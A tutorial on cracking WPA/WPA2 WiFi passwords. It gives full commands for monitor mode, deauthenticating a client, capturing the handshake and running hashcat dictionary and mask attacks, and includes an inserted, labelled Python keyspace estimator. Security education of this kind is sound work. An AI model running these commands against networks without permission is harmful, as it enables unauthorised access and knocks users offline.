How to Hack WiFi Passwords using Hashcat
2023-10-3 03:31:22 Author: infosecwriteups.com

Frost

InfoSec Write-ups

In this guide, you will learn how to crack WiFi passwords using Hashcat. Hashcat is a powerful password recovery tool that can help you recover lost or forgotten passwords for a variety of platforms, including Windows, Linux, and macOS.

Hashcat is also one of the few tools that can work with the GPU and offers many ways of finding passwords from hashes.

The simplest way to crack a hash is to guess the password. Dictionary and brute-force attacks are the most common ways of guessing.

These techniques make use of a file that contains words, phrases, common passwords, and other strings that are likely to be used as a password.

Enable Monitor Mode

First, you need to put your wireless card in monitor mode using the following command.

airmon-ng start wlan0

I will assume your wireless interface name is wlan0, but be sure to use the correct name if it differs. You can use the “iwconfig” command to find the wireless interface name.

Find Your Target

Start scanning nearby wireless routers with the following command.

airodump-ng wlan0
 CH  6 ][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2022-05-20 11:10

 BSSID              PWR  Beacons  #Data, #/s  CH  MB   ENC   CIPHER  AUTH  ESSID

 28:EF:01:34:64:92  -29       19      1    0   6  54e  WPA2  CCMP    PSK   Linksys
 28:EF:01:35:34:85  -42       17      0    0   6  54e  WPA2  CCMP    PSK   SkyNet
 28:EF:01:34:64:91  -29       19      1    0   1  54e  WPA2  CCMP    PSK   TP-LINK
 28:EF:01:35:39:87  -42       17      0    0  11  54e  WPA2  CCMP    PSK   Orange-Net

 BSSID              STATION            PWR   Rate   Lost  Packets  Probes

 28:EF:01:35:34:85  28:EF:01:23:46:68  -57   0 - 1     0        1

This displays a data table for all Wi-Fi routers in range.

For the purposes of this demo, I will choose to crack the password of my network, “SkyNet”.

Next, I need the access point MAC address (BSSID) and channel from the network. Let’s open another terminal and type:

airodump-ng --bssid 28:EF:01:35:34:85 -c 6 --write wpa-01 wlan0

--write wpa-01 sets the output file name prefix. This is the file where airodump-ng writes the captured data, and where the 4-way handshake will be stored.

You can use the “ls” command to see the file, which you later need to convert to a different format in order to crack the password.

Capture a WPA/WPA2 Handshake

WPA/WPA2 uses a 4-way handshake to authenticate devices to the network. In order to capture the 4-way authentication handshake, you need to have the client authenticate to the AP.

If they’re already authenticated, you can de-authenticate them (kick them off) and their system will automatically re-authenticate, whereby you can grab the 4-way handshake in the process. Open another terminal and type:

aireplay-ng -0 100 -a 28:EF:01:35:34:85 -c 28:EF:01:23:46:68 wlan0

-0 means deauthentication.

100 is the number of deauthentication packets to send.

-a 28:EF:01:35:34:85 is the MAC address of the access point.

-c 28:EF:01:23:46:68 is the MAC address of the client you are deauthing.

 CH  6 ][ Elapsed: 4 s ][ 2014-03-24 17:51 ][ WPA handshake: 28:EF:01:35:34:85

 BSSID              PWR  RXQ  Beacons  #Data, #/s  CH  MB  ENC   CIPHER  AUTH  ESSID

 28:EF:01:35:34:85   39  100       51      0    0   6  54  WPA2  CCMP    PSK   SkyNet

 BSSID              STATION            PWR   Rate   Lost  Packets  Probes

 28:EF:01:35:34:85  28:EF:01:23:46:68  -57   0 - 1     0        1

In the screen above, notice the “WPA handshake: 28:EF:01:35:34:85” in the top right-hand corner. This means airodump-ng has successfully captured the handshake.

Convert the .cap file to .hc22000 format

Before you crack the password, you need to convert the .cap file (wpa-01.cap) to the hashcat file format .hc22000. This can be done very quickly by uploading the .cap file to https://hashcat.net/cap2hashcat and converting it to .hc22000 format. Keep in mind that this hands your capture to a third-party site; the hcxpcapngtool utility from the hcxtools project performs the same conversion locally.

Cracking WPA/WPA2 handshake

Hashcat is very flexible, so I’ll cover the two most common attacks:

  • Dictionary attack
  • Brute-force attack

Dictionary attack

In addition to hashcat, you will also need a wordlist. A word list is a list of commonly used passwords in a big text file.

A popular password wordlist is rockyou.txt. It contains a list of commonly used passwords and is popular among pen testers. You can find the rockyou wordlist under /usr/share/wordlists in Kali Linux (it ships compressed as rockyou.txt.gz, so decompress it with gunzip first).

Now use the following command to start the cracking process:

hashcat -m 22000 wpa-01.hc22000 rockyou.txt

In this command, I am starting hashcat in mode 22000, which is for attacking WPA/WPA2 handshakes. Next, specify the name of the file you want to crack, which in my case is “wpa-01.hc22000”, and lastly “rockyou.txt” is the wordlist file.

The password was successfully cracked and is “justletmein”.

Brute-Force Attack

The brute force attack is based on trying out every possible combination, which leads to an immense number of possible combinations as the password length increases. To start the attack, use the following command:

hashcat -m 22000 -a 3 wpa-01.hc22000 ?l?l?l?l?l?l?l?l?l?l?l

-a 3 means you are using brute-force (mask) attack mode.

wpa-01.hc22000 is the converted .cap file.

?l?l?l?l?l?l?l?l?l?l?l is your mask, written as a single argument with no spaces, where each ?l stands for one lowercase letter. An 11-position mask of ?l means the password is 11 characters long and all lowercase.

Hashcat allows you to use the following built-in charsets to attack a WPA /WPA2 handshake file.

?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?h = 0123456789abcdef
?H = 0123456789ABCDEF
?s = «space»!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~

So let's say your password is 87654321. You can use a custom mask like ?d?d?d?d?d?d?d?d

This means you’re trying to break an 8-digit number password like 87654323 or 43446789…

Here you can see the password is “justletmein”, so I’m using the lowercase letters mask (?l = abcdefghijklmnopqrstuvwxyz) to crack the password.
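The dictionary and brute-force sections above come down to two questions a defender should be able to answer about a passphrase: is it in a common wordlist, and how large is the keyspace of the narrowest hashcat mask that covers it? The following Python is an added example, not code from the article or from the hashcat project. It parses hashcat's mask syntax using the built-in charsets listed above, computes the keyspace, and converts it to a worst-case time at an assumed guessing rate. The wordlist (SAMPLE_WORDLIST) and the rate (ASSUMED_RATE_PER_SECOND) are constructed assumptions standing in for rockyou.txt and for a real GPU benchmark.

```python
# Added example (not from the article): estimate how hard a WPA2 passphrase is
# to recover with the two hashcat attacks discussed above, a wordlist lookup
# (dictionary attack) and a mask walk (brute-force attack, -a 3).
# The hash rate and the wordlist below are constructed assumptions.
import string

# hashcat's built-in charsets exactly as the article lists them
CHARSETS = {
    "l": string.ascii_lowercase,      # abcdefghijklmnopqrstuvwxyz
    "u": string.ascii_uppercase,      # ABCDEFGHIJKLMNOPQRSTUVWXYZ
    "d": string.digits,               # 0123456789
    "h": "0123456789abcdef",
    "H": "0123456789ABCDEF",
    "s": " " + string.punctuation,    # space plus the 32 ASCII punctuation characters
}

# Constructed stand-in for a real wordlist such as rockyou.txt.
SAMPLE_WORDLIST = ["123456", "password", "qwerty", "iloveyou", "justletmein"]

# Assumed WPA2 (mode 22000) guessing rate; real figures depend on the GPU.
ASSUMED_RATE_PER_SECOND = 1_000_000


def parse_mask(mask: str) -> list:
    """Expand a hashcat mask into one character set per password position.

    '?l' etc. map to the built-in charsets, '??' is a literal '?', and any
    other character is a fixed literal position (as in hashcat's mask syntax).
    """
    positions = []
    i = 0
    while i < len(mask):
        if mask[i] == "?":
            if i + 1 >= len(mask):
                raise ValueError("dangling '?' at end of mask")
            key = mask[i + 1]
            if key == "?":
                positions.append("?")
            elif key in CHARSETS:
                positions.append(CHARSETS[key])
            else:
                raise ValueError(f"unknown charset ?{key}")
            i += 2
        else:
            positions.append(mask[i])
            i += 1
    return positions


def keyspace(mask: str) -> int:
    """Number of candidates hashcat must try to exhaust the mask."""
    total = 1
    for charset in parse_mask(mask):
        total *= len(charset)
    return total


def seconds_to_exhaust(mask: str, rate_per_second: int = ASSUMED_RATE_PER_SECOND) -> float:
    """Worst-case time to walk the whole mask at the given guessing rate."""
    return keyspace(mask) / rate_per_second


def minimal_mask(passphrase: str) -> str:
    """Narrowest built-in mask that still covers the passphrase.

    Each character gets the smallest charset containing it, so the result is
    the cheapest mask a brute-force run could have used to reach it.
    """
    out = []
    for ch in passphrase:
        for key in ("d", "l", "u", "s"):   # smallest charset first
            if ch in CHARSETS[key]:
                out.append("?" + key)
                break
        else:
            raise ValueError(f"character {ch!r} is outside hashcat's built-in charsets")
    return "".join(out)


def assess(passphrase: str, wordlist=SAMPLE_WORDLIST,
           rate_per_second: int = ASSUMED_RATE_PER_SECOND) -> dict:
    """Summarise exposure to both attacks for one passphrase."""
    mask = minimal_mask(passphrase)
    return {
        "in_wordlist": passphrase in wordlist,   # falls to a dictionary attack at once
        "mask": mask,
        "keyspace": keyspace(mask),
        "days_to_exhaust": seconds_to_exhaust(mask, rate_per_second) / 86400,
    }


if __name__ == "__main__":
    for candidate in ("justletmein", "87654321", "Tr0ub4dor&3"):
        print(candidate, assess(candidate))
```

Running it shows why the article's two examples fell: “87654321” sits in a ?d?d?d?d?d?d?d?d keyspace of only 10^8, and “justletmein”, although its ?l mask keyspace of 26^11 would take years at the assumed rate, is in the wordlist and so never needs the mask at all. A passphrase that is both absent from common wordlists and long enough that its minimal mask is out of reach is what the two attacks together cannot touch.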

Conclusion

In this guide, you have learned how to crack WPA2 passwords using tools like Hashcat. This kind of activity should only be performed in a controlled environment where permission is given.

I hope you enjoyed this comprehensive tutorial. If you have any questions, feel free to leave a comment.

Thank you!

Article source: https://infosecwriteups.com/how-to-hack-wifi-passwords-using-hashcat-561b18e486e8?source=rss----7b722bfd1b8d---4